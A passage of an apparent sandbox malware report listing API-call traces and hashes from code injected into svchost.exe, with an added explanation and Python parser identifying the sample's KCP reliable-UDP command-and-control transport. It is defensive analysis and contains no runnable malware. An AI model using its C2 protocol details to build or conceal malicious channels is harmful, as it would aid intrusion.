                                                                                                                • Part of subcall function 02583640: _free.LIBCMT ref: 0258367C
                                                                                                                • Part of subcall function 02583640: _malloc.LIBCMT ref: 025836B7
                                                                                                                • Part of subcall function 02583640: _memset.LIBCMT ref: 025836C5
                                                                                                              • InterlockedIncrement.KERNEL32(0259D990), ref: 02583545
                                                                                                              • InterlockedIncrement.KERNEL32(0259D990), ref: 02583553
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0258357A
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02583593
                                                                                                              • ResetEvent.KERNEL32(?,?,?,0259D990), ref: 025835CE
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02583601
                                                                                                              • GetLastError.KERNEL32 ref: 02583619
                                                                                                                • Part of subcall function 02583F50: GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                                • Part of subcall function 02583F50: send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
                                                                                                                • Part of subcall function 02583F50: SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                                • Part of subcall function 02583F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                                • Part of subcall function 02583F50: WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                                • Part of subcall function 02583F50: shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                                • Part of subcall function 02583F50: closesocket.WS2_32(?), ref: 02584015
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02583629
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 127459856-0
                                                                                                              • Opcode ID: 1c458ca6965d12bfe8ce0966d09d3978bca9e5a7df0a3452ff97f779392ccead
                                                                                                              • Instruction ID: 0ff89520b12aa18467d6309c2f6b714c76ddd17c7e042ee4f55f31e36cd7a61f
                                                                                                              • Opcode Fuzzy Hash: 1c458ca6965d12bfe8ce0966d09d3978bca9e5a7df0a3452ff97f779392ccead
                                                                                                              • Instruction Fuzzy Hash: D441A2B1640704AFD360EF69DC80B6AB7E4FB48710F50086EE646E7640D7B1E8148F94
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 04DF3667
                                                                                                                • Part of subcall function 04DF3660: _free.LIBCMT ref: 04DF369C
                                                                                                                • Part of subcall function 04DF3660: _malloc.LIBCMT ref: 04DF36D7
                                                                                                                • Part of subcall function 04DF3660: _memset.LIBCMT ref: 04DF36E5
                                                                                                              • InterlockedIncrement.KERNEL32(04E21F0C), ref: 04DF3565
                                                                                                              • InterlockedIncrement.KERNEL32(04E21F0C), ref: 04DF3573
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 04DF359A
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 04DF35B3
                                                                                                              • ResetEvent.KERNEL32(?,?,?,04E21F0C), ref: 04DF35EE
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 04DF3621
                                                                                                              • GetLastError.KERNEL32 ref: 04DF3639
                                                                                                                • Part of subcall function 04DF3F60: GetCurrentThreadId.KERNEL32 ref: 04DF3F65
                                                                                                                • Part of subcall function 04DF3F60: send.WS2_32(?,04E159C0,00000010,00000000), ref: 04DF3FC6
                                                                                                                • Part of subcall function 04DF3F60: SetEvent.KERNEL32(?), ref: 04DF3FE9
                                                                                                                • Part of subcall function 04DF3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 04DF3FF5
                                                                                                                • Part of subcall function 04DF3F60: WSACloseEvent.WS2_32(?), ref: 04DF4003
                                                                                                                • Part of subcall function 04DF3F60: shutdown.WS2_32(?,00000001), ref: 04DF401B
                                                                                                                • Part of subcall function 04DF3F60: closesocket.WS2_32(?), ref: 04DF4025
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 04DF3649
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 127459856-0
                                                                                                              • Opcode ID: 72027df2480270b120f44f24f2c4cab5347152d30b23f52d704158a3f3c335bb
                                                                                                              • Instruction ID: ff10a6ed8b1bf32d64129a02c9f9eb8b5179091159503036eebbe6e2f0259b6a
                                                                                                              • Opcode Fuzzy Hash: 72027df2480270b120f44f24f2c4cab5347152d30b23f52d704158a3f3c335bb
                                                                                                              • Instruction Fuzzy Hash: FA418DB1640704AFE360EF69DD81B6AF7E8FB48701F12452EEA46D7640D7B5F8448B60
                                                                                                              APIs
                                                                                                              • ResetEvent.KERNEL32(?), ref: 02584433
                                                                                                              • ResetEvent.KERNEL32(?), ref: 0258443C
                                                                                                              • timeGetTime.WINMM ref: 0258443E
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0258444D
                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 0258449B
                                                                                                              • ResetEvent.KERNEL32(?), ref: 025844B8
                                                                                                                • Part of subcall function 02583F50: GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                                • Part of subcall function 02583F50: send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
                                                                                                                • Part of subcall function 02583F50: SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                                • Part of subcall function 02583F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                                • Part of subcall function 02583F50: WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                                • Part of subcall function 02583F50: shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                                • Part of subcall function 02583F50: closesocket.WS2_32(?), ref: 02584015
                                                                                                              • ResetEvent.KERNEL32(?), ref: 025844CC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                              • String ID:
                                                                                                              • API String ID: 542259498-0
                                                                                                              • Opcode ID: 4443ab9c429f4f4627b4abd00992b274ac77ccb06a2466fd2cd87c141500df9d
                                                                                                              • Instruction ID: 69e9c4e221d043380ece8f7f41f6033b4e9f3a421a68698b7c39398282adb011
                                                                                                              • Opcode Fuzzy Hash: 4443ab9c429f4f4627b4abd00992b274ac77ccb06a2466fd2cd87c141500df9d
                                                                                                              • Instruction Fuzzy Hash: 912193726407046BC630EF79DC84BABB7E8FF89710F100A0EF58AC7650E771A4148BA9
                                                                                                              APIs
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF4443
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF444C
                                                                                                              • timeGetTime.WINMM ref: 04DF444E
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04DF445D
                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 04DF44AB
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF44C8
                                                                                                                • Part of subcall function 04DF3F60: GetCurrentThreadId.KERNEL32 ref: 04DF3F65
                                                                                                                • Part of subcall function 04DF3F60: send.WS2_32(?,04E159C0,00000010,00000000), ref: 04DF3FC6
                                                                                                                • Part of subcall function 04DF3F60: SetEvent.KERNEL32(?), ref: 04DF3FE9
                                                                                                                • Part of subcall function 04DF3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 04DF3FF5
                                                                                                                • Part of subcall function 04DF3F60: WSACloseEvent.WS2_32(?), ref: 04DF4003
                                                                                                                • Part of subcall function 04DF3F60: shutdown.WS2_32(?,00000001), ref: 04DF401B
                                                                                                                • Part of subcall function 04DF3F60: closesocket.WS2_32(?), ref: 04DF4025
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF44DC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                              • String ID:
                                                                                                              • API String ID: 542259498-0
                                                                                                              • Opcode ID: 05a36519dc3e943c18bf2078ad40ab512230277cb6e444986f75b43c9fe857b2
                                                                                                              • Instruction ID: 417981395d128afaca027e3c9295cebfa9847de1bf46e80043595051decc9c3c
                                                                                                              • Opcode Fuzzy Hash: 05a36519dc3e943c18bf2078ad40ab512230277cb6e444986f75b43c9fe857b2
                                                                                                              • Instruction Fuzzy Hash: C62171766407046BD630EF79EC85B97B3E8FF99715F110A1EEA8AC3650D671F8048BA0
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 02584E79
                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 02584E98
                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 02584EA2
                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 02584EB9
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02584EC2
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02584EC9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 4082018349-0
                                                                                                              • Opcode ID: 91e7724ab9842986172d243b9489e7046316ea4950acb183c8dc1afdb38c1f3e
                                                                                                              • Instruction ID: 63a47812517ce3cb503b9ff0dee285bbc271fc8f0fd5d7dbed9e0870a9e5842a
                                                                                                              • Opcode Fuzzy Hash: 91e7724ab9842986172d243b9489e7046316ea4950acb183c8dc1afdb38c1f3e
                                                                                                              • Instruction Fuzzy Hash: 701166327043058BD320EF79EC84A6BB7DCFF88215B40092AE945D6540E7B1D825C6AA
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 04DF4E99
                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 04DF4EB8
                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 04DF4EC2
                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 04DF4ED9
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF4EE2
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF4EE9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 4082018349-0
                                                                                                              • Opcode ID: 2a4099c3f05dbdc35e91f66899c820d0db11b7938dcef29fb8c2b95cb6e5055e
                                                                                                              • Instruction ID: fcbfc3d402419e216f6e08d76542b85a4beb69ec63f5388b954d70c14f1ad93a
                                                                                                              • Opcode Fuzzy Hash: 2a4099c3f05dbdc35e91f66899c820d0db11b7938dcef29fb8c2b95cb6e5055e
                                                                                                              • Instruction Fuzzy Hash: 6C1163327003059BD330EE6AEC8496BF7ECFF98326B05056BEA15C2550DA75F804C6A5
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 04DFDD82
                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 04DFDE85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: Main
                                                                                                              • API String ID: 1452528299-521822810
                                                                                                              • Opcode ID: d49830268b86bbf7949883c699d21dc4c9bff4f9bdb4c12ab27f3b749e957f5d
                                                                                                              • Instruction ID: 59a7ba06183abf3bf1f81b72d4815d1d802079ae711b9cf101993f2edead9328
                                                                                                              • Opcode Fuzzy Hash: d49830268b86bbf7949883c699d21dc4c9bff4f9bdb4c12ab27f3b749e957f5d
                                                                                                              • Instruction Fuzzy Hash: D2410032A402059FE720DF68DC81BAAB3F6FF54314F0586A9D98A8B351E774F845CB80
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                              • SetLastError.KERNEL32(0000139F,?,7591DFA0,02583628), ref: 02584044
                                                                                                                • Part of subcall function 02582B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02582B96
                                                                                                                • Part of subcall function 02582B80: SwitchToThread.KERNEL32 ref: 02582BAA
                                                                                                              • send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
                                                                                                              • SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                              • WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                              • shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                              • closesocket.WS2_32(?), ref: 02584015
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 3254528666-0
                                                                                                              • Opcode ID: 29fdf06e1f57ab692066b2476fa0b4e58cef4e9809d1b28e281565a229cc9e35
                                                                                                              • Instruction ID: c7111e9278732811f32339d83cc865008d8bc84c55e8238c004bd6be83e33f93
                                                                                                              • Opcode Fuzzy Hash: 29fdf06e1f57ab692066b2476fa0b4e58cef4e9809d1b28e281565a229cc9e35
                                                                                                              • Instruction Fuzzy Hash: 29217C702407019BD330AF64D888B6BBBF9FF44714F500D1DE682AA680D7B9E469DB98
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584064
                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584077
                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584080
                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584089
                                                                                                                • Part of subcall function 02581350: HeapFree.KERNEL32(?,00000000,?,?,?,02584096,?,00000000,02584029,?,7591DFA0,02583628), ref: 02581390
                                                                                                                • Part of subcall function 02581420: HeapFree.KERNEL32(?,00000000,?,?,?,025840A1,?,00000000,02584029,?,7591DFA0,02583628), ref: 0258143D
                                                                                                                • Part of subcall function 02581420: _free.LIBCMT ref: 02581459
                                                                                                              • HeapDestroy.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 025840A9
                                                                                                              • HeapCreate.KERNEL32(?,?,?,?,00000000,02584029,?,7591DFA0,02583628), ref: 025840C4
                                                                                                              • SetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584140
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584147
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1219087420-0
                                                                                                              • Opcode ID: 250495d5d28481d30fe96c6cc4d981443f6c653beef6097e3ccd22c6ba71bd16
                                                                                                              • Instruction ID: be4ed254c6a80a5145fde15306b9a488bd7e07b66af30bc07d9b375863aedc33
                                                                                                              • Opcode Fuzzy Hash: 250495d5d28481d30fe96c6cc4d981443f6c653beef6097e3ccd22c6ba71bd16
                                                                                                              • Instruction Fuzzy Hash: 8D314470600A02EFD705EF38C898BA6F7A9FF48310F408659E8299B250DB75B865CFD4
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_malloc
                                                                                                              • String ID: ($6$gfff$gfff
                                                                                                              • API String ID: 3506388080-713438465
                                                                                                              • Opcode ID: 14e950ddf0dccbf98cbf7d550d4d5d320185db8f8e9866791adc7453f3865733
                                                                                                              • Instruction ID: feac29e046e93d51c25550d2bdee0a295dbb905e9ebb764e402aad54b292e7da
                                                                                                              • Opcode Fuzzy Hash: 14e950ddf0dccbf98cbf7d550d4d5d320185db8f8e9866791adc7453f3865733
                                                                                                              • Instruction Fuzzy Hash: 88D15DB1E01318AFEB10EFA9DC85A9EBBBAFF44304F104529E505A7251E774AD05CB61
                                                                                                              APIs
                                                                                                                • Part of subcall function 02581610: __vswprintf.LIBCMT ref: 02581646
                                                                                                              • _malloc.LIBCMT ref: 02582330
                                                                                                                • Part of subcall function 02586F63: __FF_MSGBANNER.LIBCMT ref: 02586F7C
                                                                                                                • Part of subcall function 02586F63: __NMSG_WRITE.LIBCMT ref: 02586F83
                                                                                                                • Part of subcall function 02586F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586FA8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap__vswprintf_malloc
                                                                                                              • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                              • API String ID: 3723585974-868042568
                                                                                                              • Opcode ID: 9db1c6bac3563d061337b94c3eb0bd798260d2d2980db8a59b628ca367f2ff8d
                                                                                                              • Instruction ID: 6dfd1a1bdc52e0bba7599f3f38fdbc5b480cbaa148ae6eb39181ad1809cfae3a
                                                                                                              • Opcode Fuzzy Hash: 9db1c6bac3563d061337b94c3eb0bd798260d2d2980db8a59b628ca367f2ff8d
                                                                                                              • Instruction Fuzzy Hash: B9B1D871A002458FCF18EF68D8906AA7FA1FF84310F0485AEDD49EB346DBB1D941CB98
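The format strings in the record above ("[RI] %d bytes", "input ack: sn=%lu rtt=%ld rto=%ld", "input psh: sn=%lu ts=%lu", "input probe", "input wins: %lu") are, verbatim, the IKCP_LOG_INPUT messages that ikcp_input() emits in the open-source KCP ARQ library (ikcp.c), one per segment command: PUSH, ACK, WASK (window probe) and WINS (window size). Their presence in the image at 02580000 inside the injected svchost process indicates that the payload carries a KCP reliable-UDP transport, so any captured C2 datagrams are worth checking against the KCP segment layout. The Python below is an added example, not code from the sample or from the KCP project: it splits a datagram into KCP segments using the stock ikcp.c wire format (24-byte little-endian header of conv, cmd, frg, wnd, ts, sn, una, len; command values 81 to 84) with the same sanity checks ikcp_input() applies, and renders the one-line summaries the log strings describe. The datagram is constructed; the rtt/rto fields of the ack message are omitted because they depend on the sender's state. A RAT build may alter the conv or command constants, so treat a parse failure as a lead, not a verdict.

```python
"""Parse KCP segments as laid out by stock ikcp.c (added example; the datagram below is constructed)."""
import struct
from dataclasses import dataclass
from typing import List, Optional

IKCP_OVERHEAD = 24  # fixed header size in ikcp.c
IKCP_CMD_PUSH, IKCP_CMD_ACK, IKCP_CMD_WASK, IKCP_CMD_WINS = 81, 82, 83, 84
# Verb used by the sample's "input ..." log strings for each command.
CMD_VERB = {IKCP_CMD_PUSH: "psh", IKCP_CMD_ACK: "ack", IKCP_CMD_WASK: "probe", IKCP_CMD_WINS: "wins"}
# conv(u32) cmd(u8) frg(u8) wnd(u16) ts(u32) sn(u32) una(u32) len(u32), little-endian as in ikcp_encode*()
HEADER = struct.Struct("<IBBHIIII")


@dataclass
class KcpSegment:
    conv: int
    cmd: int
    frg: int
    wnd: int
    ts: int
    sn: int
    una: int
    data: bytes

    @property
    def verb(self) -> str:
        return CMD_VERB.get(self.cmd, "unknown")


def parse_kcp_datagram(buf: bytes, expect_conv: Optional[int] = None) -> List[KcpSegment]:
    """Split one UDP payload into segments with the checks ikcp_input() makes: a full header left,
    matching conv, known cmd, and a length that fits. Trailing bytes shorter than a header are ignored."""
    segments: List[KcpSegment] = []
    off = 0
    while len(buf) - off >= IKCP_OVERHEAD:
        conv, cmd, frg, wnd, ts, sn, una, length = HEADER.unpack_from(buf, off)
        off += IKCP_OVERHEAD
        if expect_conv is not None and conv != expect_conv:
            raise ValueError(f"conv mismatch: got {conv:#x}, expected {expect_conv:#x}")
        if cmd not in CMD_VERB:
            raise ValueError(f"unknown cmd {cmd} at offset {off - IKCP_OVERHEAD}")
        if len(buf) - off < length:
            raise ValueError(f"segment sn={sn} claims {length} bytes, only {len(buf) - off} left")
        segments.append(KcpSegment(conv, cmd, frg, wnd, ts, sn, una, bytes(buf[off:off + length])))
        off += length
    return segments


def is_rejected(buf: bytes, expect_conv: Optional[int] = None) -> bool:
    """True when the datagram fails the ikcp_input() sanity checks."""
    try:
        parse_kcp_datagram(buf, expect_conv)
    except ValueError:
        return True
    return False


def build_segment(conv: int, cmd: int, *, sn: int = 0, ts: int = 0, una: int = 0,
                  wnd: int = 32, frg: int = 0, data: bytes = b"") -> bytes:
    """Encode one segment the way ikcp_encode*() does; used here to build sample traffic."""
    return HEADER.pack(conv, cmd, frg, wnd, ts, sn, una, len(data)) + data


def describe(buf: bytes, expect_conv: Optional[int] = None) -> List[str]:
    """Render the summaries ikcp_input() logs with IKCP_LOG_INPUT enabled (rtt/rto omitted)."""
    lines = [f"[RI] {len(buf)} bytes"]
    for seg in parse_kcp_datagram(buf, expect_conv):
        if seg.cmd == IKCP_CMD_PUSH:
            lines.append(f"input psh: sn={seg.sn} ts={seg.ts}")
        elif seg.cmd == IKCP_CMD_ACK:
            lines.append(f"input ack: sn={seg.sn}")
        elif seg.cmd == IKCP_CMD_WASK:
            lines.append("input probe")
        else:
            lines.append(f"input wins: {seg.wnd}")
    return lines


# Constructed datagram: a data push, an ack and a window update, all on conv 0x1234.
SAMPLE_CONV = 0x1234
SAMPLE_DATAGRAM = (
    build_segment(SAMPLE_CONV, IKCP_CMD_PUSH, sn=7, ts=1000, data=b"hello")
    + build_segment(SAMPLE_CONV, IKCP_CMD_ACK, sn=3, ts=900)
    + build_segment(SAMPLE_CONV, IKCP_CMD_WINS, wnd=64)
)

if __name__ == "__main__":
    for line in describe(SAMPLE_DATAGRAM, SAMPLE_CONV):
        print(line)
```

When hunting in a pcap, group datagrams by the 32-bit conv value: KCP uses it as the session identifier, so every segment of one C2 session shares it, and a conv that never changes across hosts is a usable network indicator.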
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$_malloc_memcpy_s
                                                                                                              • String ID: &
                                                                                                              • API String ID: 3027343870-3042966939
                                                                                                              • Opcode ID: 65a83305db069607c3800c09f97923d581d55ee0e02ebb3e7461dd1c2ae80e3c
                                                                                                              • Instruction ID: 89d7471db2960318dd8ac96eba71067386951c8d3c717efad8c9009696bf2e6e
                                                                                                              • Opcode Fuzzy Hash: 65a83305db069607c3800c09f97923d581d55ee0e02ebb3e7461dd1c2ae80e3c
                                                                                                              • Instruction Fuzzy Hash: 25C152F1A002199BEB24CF55CCC0BAAB7BAFF48304F1485ADE60DA7201D774AA85CF55
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: b4b76cfa2a3edca40d2e8d6e3424fa7c7b6a0884fbeb5bfd7a5d855ec5682a45
                                                                                                              • Instruction ID: 67e56d14cf4ce6ded4d65fe17d4757514412048b76445448156e7758a08ed21d
                                                                                                              • Opcode Fuzzy Hash: b4b76cfa2a3edca40d2e8d6e3424fa7c7b6a0884fbeb5bfd7a5d855ec5682a45
                                                                                                              • Instruction Fuzzy Hash: 2A515C72A00211DFDB14DF58D5C4899BBA6BF8D30871980BDC50D9B361DB32AD52CF92
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                              • Instruction ID: d1d508628e642a26344fe5b2cdcef12adcd4299d48008dfa3e82605e65c151e4
                                                                                                              • Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                              • Instruction Fuzzy Hash: DA512AB2A001118FD714DF59C5C08A9BBA7BF8A31472D80ADC6599B321DB32BE02DB91
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 02581878
                                                                                                              • _free.LIBCMT ref: 025818B6
                                                                                                              • _free.LIBCMT ref: 025818F5
                                                                                                              • _free.LIBCMT ref: 02581935
                                                                                                              • _free.LIBCMT ref: 0258195D
                                                                                                              • _free.LIBCMT ref: 02581981
                                                                                                              • _free.LIBCMT ref: 025819B9
